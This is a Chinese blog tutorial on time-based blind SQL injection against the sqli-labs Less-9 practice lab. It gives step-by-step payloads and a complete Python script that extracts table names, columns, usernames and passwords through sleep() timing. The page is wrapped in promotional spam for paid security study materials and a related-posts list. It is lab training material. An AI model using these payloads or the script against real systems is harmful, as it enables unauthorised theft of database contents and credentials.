SQL注入——sqli-labs-Less-9时间盲注_sqliless9,解析底层原理

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量777 收藏 12
点赞数 24
分类专栏: 2024年程序员学习 文章标签: sql less 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84433486/article/details/137892869
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

3.表名长度

下面这个payload中,x代表是第几个表,y代表表名长度是多少:

?id=1' and if(length(select table_name from information_schema.tables where table_schema = database() limit x,1)<y,sleep(5),1)--+

下面是security数据库中的第一个表的表名长度:

?id=1' and if(length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1))=6,sleep(5),1)--+
4.推测表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1)--+

测得第一个表名的第一位是“e”,递推下去得到表名:emails

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114,sleep(5),1)--+

然后,第二个表名的第一位是“r”,依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”

下面尝试注users表

5.猜测users表的列
?id=1' and if(ascii(substr((select column_name from information _schema.columns where table_name='users' limit 0,1),1,1))=105,sleep(5),1)--+

测得第一列的名称的第一个字符是“i”,同样类推,得到第一列名为“id”,第二列“username”第三列“password”

6.猜测username、password的所有内容
?id=1' and if(ascii(substr((select username from users limit 0,1), 1,1))=68,sleep(5),1)--+

手注是可以注出来,但是相当费时间,我认为,手注更大的意义在于理解方法。所以这里搬运了老师傅的时间盲注脚本我们共同学习:

注意:共有6处url需要改成你自己的url

import requests


# 获取数据库名长度
def database_len():
    for i in range(1, 10):
        url = f"http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(length(database())>{i},1,sleep(2))"
        r = requests.get(url + '%23')
        if r.elapsed.total_seconds()>2:
            print('database_length:', i)
            return i


#获取数据库名
def database_name(databaselen):
     name = ''
     for j in range(1, databaselen+1):
        for i in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz":
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr(database(),%d,1)='%s',sleep(2),1)" % (j, i)
            #print(url+'%23')
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
     print('database_name:', name)


# 获取数据库表
def tables_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr((select group_concat(table_name) from information_schema.tables " \
                  "where table_schema=database()),%d,1)='%s',sleep(2),1)" % (j, i)
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
    print('table_name:', name)



# 获取表中字段
def columns_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr((select group_concat(column_name) from information_schema.columns where " \
                  "table_schema=database() and table_name='users'),%d,1)='%s',sleep(2),1)" % (j, i)
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
    print('column_name:', name)



# 获取username
def username_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr((select group_concat(username) from users),%d,1)='%s',sleep(2),1)" % (j, i)
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
    print('username_value:', name)



# 获取password
def password_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr((select group_concat(password) from users),%d,1)='%s',sleep(2),1)" % (j, i)
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
    print('password_value:', name)


if __name__ == '__main__':
    dblen = database_len()
    database_name(dblen)
    tables_name()
    columns_name()
    username_value()
    password_value()

等待脚本跑完,成功得到信息:

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

止,不再深入研究,那么很难做到真正的技术提升。**

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-qkVA1lLi-1713365620107)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84433486
关注
  • 24
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs 9~15
eleven_77_的博客
11-14 158
Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注) 不管怎么输入,回显总是you are … 查看源码可知不管你怎么输入,输出结果都是You are in ,这就必须通过时间来判断了 于是考虑时间盲注,payload ?id=1’ and sleep(3) --+ 此时发现明显延迟,说明注入成功,接着我们进行爆破即可 爆库payload ?id=1’ and if(length(database())=4 , sleep(3
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs(less-9)
不知名白帽的博客
07-14 956
sqli-labs(less-9)。less-9(时间盲注)
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,2024年最新面试宝典
2401_84183070的博客
04-10 600
时间盲注,通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。
详细sqli-labs(1-20)通关讲解
最新发布
m0_57928318的博客
05-18 1177
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs less-9
阿刁〇的博客
04-01 133
文章目录sqli-labs less-9* 判断注入* 判断列数* 查询详细信息 sqli-labs less-9 本关和前几关的注入方式又不一样,不过我们还是按步骤来 * 判断注入 首先输入?id=1 回显正常 ?id=1' 回显正常 ?id=1" 回显正常 由此可知,本关没有布尔类型状态,输入语句的正确与否回显均为You are in…,故本关采用延时注入的方式 我们需要用到sleep函数 ?id=1' and (sleep(5)) --+ 耗时7秒 ?id=1 and (sleep(5))
sqli-labs:less-9(时间盲注
羽的博客
07-21 414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset...
网络安全-sqlmap实战之sqlilabs-Less9
关注网络安全、云原生安全
06-29 1110
类型 时间盲注-单引号 -dbs枚举数据库 使用-o参数优化,,--technique参数指定技术,--batch参数进行跳过 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch 过程 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms .
sqli-labs (less9-less10)
Xi4or0uji
07-27 770
less 9 get方法单引号绕过时间盲注 这关是时间盲注,因为无论是对还是错,回显都是you are in,为了区分,我们可以用sleep()函数,错误的时候返回就会延时,方便我们判断 payload是?id=1' and If(mid((select schema_name from information_schema.schemata limit 0,1),2,1)='h',1,sl...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs实验指导手册
11-17
sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及的SQL注入知识点的详细说明: 1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数...
sqli-labs PoC 脚本.rar
08-09
课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料...
sqli-labs靶场Less-9
songling515010475的专栏
08-25 151
1、访问首页,/Less-9/index.php?id=1,这里的传参点是id 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 http://192.168.60.142:8080/sqlilabs/Less-9/index.php?id=1 ' and sleep(10)-- qwe 分析:通过测试,这里是通过单引号闭合,同时使用延时注入才生效,哪么在以后SQL注入探测时,当前面5.
sqli靶场通关之less9
sunxueer的博客
07-19 1228
sqli less9 时间盲注 结合burpsuite 1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。 1. 求闭合字符 id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了 查看源码,证实了猜测,尝试使用时间盲注 id=1 and sleep(5) //未延迟 i
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1598
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间盲注(Time-based blind)
[sql注入]时间盲注模板+sqli靶场less-9
qq_37301470的博客
11-13 445
less-9 观察页面只有一个返回值You are in… 即使值为错也没有返回 因此采用时间盲注 import requests import string import time ip="http://a86ecc66-5929-4b0d-b39c-842de53f0121.node4.buuoj.cn/Less-9/?id=" command="database()" result="" for i in range(1,100): for j in string.ascii_letters:
sqli-labs (less-9)
kukudeshuo的博客
03-08 1377
sqli-labs (less-9) 补充知识 本关将介绍与Boolean盲注非常相似的另一种注入方法——时间盲注。他与Boolean盲注的不同之处在于,时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则IF()的返回值为expr2;否则返回值则为expr3。 例: if (length(database())>1,1,sleep(5)),这句语句的意思是查
sqli-labs 9
qq_55777983的博客
07-29 389
less -9 很快啊,我们来到了第9题 掌握了第8题的技巧,第九题其实就是在布尔盲注的基础上构造了能自己判断语句正确的能力而使用了sleep()函数 所以也叫延时注入 我们惊讶的发现原本应该报错的?id=1’都是这样的回显 尝试了很多只会回显 显然这题使得布尔型盲注都无法使用 所以我们使用延时注入来判断语句的对错 ?id=1’ and sleep(5) --+ 我们注入这样的语句,发现页面标签转了好久的圈圈差不多是五秒 由于我们的1’成功闭合前面–+又注释了后面 而and连接了前面正确的语句所以执行了后

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值